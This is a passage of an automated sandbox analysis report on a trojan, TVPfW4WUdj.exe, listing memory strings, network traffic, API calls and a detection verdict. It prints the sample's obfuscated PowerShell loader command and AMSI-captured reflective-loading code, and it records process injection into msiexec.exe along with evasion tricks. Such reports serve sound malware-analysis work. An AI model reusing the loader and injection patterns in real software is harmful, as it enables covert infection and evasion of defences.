00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2290560307.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2428136172.000000000636B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

      System Summary

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exe
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_00404C68
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_0040698E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_07AAC35E
      Source: TVPfW4WUdj.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine, Classification label: mal100.troj.evad.winEXE@6/13@2/2
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_00402104 CoCreateInstance
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, File created: C:\Users\user\AppData\Roaming\luminances
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, File created: C:\Users\user\AppData\Local\Temp\nsbB56D.tmp
      Source: TVPfW4WUdj.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: TVPfW4WUdj.exe, Virustotal: Detection: 70%
      Source: TVPfW4WUdj.exe, ReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, File read: C:\Users\user\Desktop\TVPfW4WUdj.exe
      Source: unknown, Process created: C:\Users\user\Desktop\TVPfW4WUdj.exe "C:\Users\user\Desktop\TVPfW4WUdj.exe"
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Section loaded: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, ntmarta.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, wintypes.dll, textshaping.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll, ncrypt.dll, ntasn1.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll, ntmarta.dll, apphelp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: TVPfW4WUdj.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: qm.Core.pdbk source: powershell.exe, 00000002.00000002.1779505501.0000000008B12000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara match, File source: 00000007.00000002.2661194576.00000000047B4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000002.00000002.1781252589.000000000A374000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: GetDelegateForFunctionPointer((Rumraket $Sigtelinjers $Sulter), (Flashbackets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anledningernes = [AppDomain]::CurrentDomain.GetAssemblies()$
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mulse)), $Licencee).DefineDynamicModule($Lrerflugt, $false).DefineType($Sypigernes, $Majoriserendes, [System.MulticastDelegate])$ambon
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_07AA0FC4 push es; iretd 2_2_07AA0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 2_2_098139C1 push 8BD38B50h; iretd 2_2_098139C6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exe

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7351
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2267
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476 Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 3280 Thread sleep count: 36 > 30
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 3280 Thread sleep time: -360000s >= -30000s
      Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe Code function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: ModuleAnalysisCache.2.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005887000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.2.dr Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005887000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005887000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: msiexec.exe, 00000007.00000003.1836071609.0000000006317000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.0000000006317000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: ModuleAnalysisCache.2.dr Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe API call chain: ExitProcess graph end node graph_0-3761
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe API call chain: ExitProcess graph end node graph_0-3753
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
